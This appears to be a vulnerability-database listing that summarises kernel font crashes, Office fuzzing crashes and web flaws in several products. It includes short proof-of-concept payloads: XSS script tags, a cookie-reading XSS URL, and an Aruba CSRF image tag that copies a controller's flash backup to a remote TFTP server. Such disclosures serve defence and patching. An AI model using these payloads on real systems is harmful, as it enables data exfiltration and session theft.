Explore Vulnerabilities

Explore all Exploits:

Windows Kernel Memory Corruption

A vulnerability in the Windows kernel's ATMFD.DLL OpenType driver allows for a denial of service attack when processing corrupted OTF font files. The vulnerability is triggered when the driver attempts to access memory that has already been freed, resulting in a DRIVER_PAGE_FAULT_IN_FREED_SPECIAL_POOL (d5) bugcheck.

Windows Kernel Crash in win32k!fsc_RemoveDups

A Windows kernel crash was encountered in the win32k!fsc_RemoveDups function while processing corrupted TTF font files. The crash is a PAGE_FAULT_IN_NONPAGED_AREA (50) bugcheck. The referenced address is ff6e7000, and the instruction that referenced the bad memory address is at 91e809df.

MS Office 2007 Crash

A crash was observed in MS Office 2007 running under Windows 2003 x86. The Microsoft Office File Validation Add-In was disabled and Application Verifier was enabled for testing and reproduction. This sample did not reproduce in Office 2010 running on Windows 7 x86. The attached minimized PoC produces the crash with 2 bit changes from the original file, at offsets 0x11E60 and 0x1515F. Standard Office document parsers did not reveal anything significant about these locations.

Microsoft Office 2007/2010 Memory Corruption Vulnerability

The crash is caused by a 1 bit delta from the original file at offset 0x31B. OffViz identified this offset as WordBinaryDocuments[1].WordBinaryDocument[0].WordFIB.FIBTable97.fcPlcfFldMom with an original value of 0x000072C6 and a fuzzed value of 0x00007AC6.

WordPress MDC Private Message Persistent XSS

The 'message' field doesn't sanitize input, allowing a less privileged user (Editor, Author, etc.) to execute an XSS attack against an Administrator. Place <script>alert('Hello!')</script> in the message field of a private message and then submit. Open the message and the alert window will fire.

WordPress Googmonify Plug-in XSS/CSRF

WordPress Googmonify Plugin version 0.8.1 is vulnerable to Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF). The vulnerability exists due to insufficient sanitization of user-supplied input in the 'PID', 'Limit' and 'AID' parameters of the 'googmonify.php' script. An attacker can exploit this vulnerability to inject malicious JavaScript code into the application and execute it in the browser of an unsuspecting user in the context of the vulnerable website.

Pligg CMS Arbitrary Code Execution

Pligg CMS is a CMS written in PHP and licensed under GPL v2.0. In the "add page" section of the Pligg CMS admin panel, the admin is allowed to add PHP code inside {php} {/php} tags. A CSRF vulnerability in the add-page section allows an attacker to execute PHP code on the server. In this exploit, the code echo '<h1> Hacked </h1>'; is added. After the HTML file is executed, the page can be accessed at http://localhost/pligg-cms/page.php?page=Hacked.

Vifi Radio v1 – CSRF (Arbitrary Change Password) Exploit

Vifi Radio v1 is vulnerable to CSRF (Cross-Site Request Forgery) which allows an attacker to change the password of any user without their knowledge. An attacker can craft a malicious HTML page containing a form with hidden fields and submit it to the vulnerable application. This will cause the application to change the password of the user without their knowledge or consent.

Aruba Mobility Controller CSRF And XSS Vulnerabilities

Aruba Networks is an HP company and one of the leaders in enterprise Wi-Fi. The Aruba Controller suffers from CSRF and XSS vulnerabilities.

Proof of Concept - CSRF (192.168.0.1 is the controller IP address, 172.17.0.1 is the remote TFTP server):

<IMG width=1 height=1 SRC="'https://192.168.0.1:4343/screens/cmnutil/copyLocalFileToTftpServerWeb.xml?flashbackup.tar.gz,172.17.0.1,flashbackup.tar.gz'">

Proof of Concept - XSS:

https://192.168.0.1:4343/screens/switch/switch_mon.html?mode=plog-custom&mode-title=test</td><img width=1 height=1 src=/images/logo-mobility-controller.gif onLOAD=alert(document.cookie)>
